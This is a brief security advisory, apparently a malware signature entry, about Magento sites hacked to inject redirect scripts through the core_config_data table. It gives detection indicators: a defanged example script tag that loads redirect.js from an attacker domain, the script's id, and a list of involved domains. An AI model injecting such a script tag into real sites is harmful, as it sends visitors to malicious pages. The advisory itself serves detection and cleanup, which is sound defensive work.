Description: Magneto-specific hacks that injects redirect scripts into web pages.
The scripts can be recognized by the /redirect_base/redirect.js path and id of 1371499155545
<script src="hxxps://ribinski[.]us/redirect_base/redirect.js" id="1371499155545"></script>
Domains involved: florentbodart[.]us, ribinski[.]us, africangirl[.]top, africangrey[.]top
The scripts are typically injected into the core_config_data table. For example in the design/head/includes section.
Affecting: Magento
Mitigation How to clean a hacked Magento site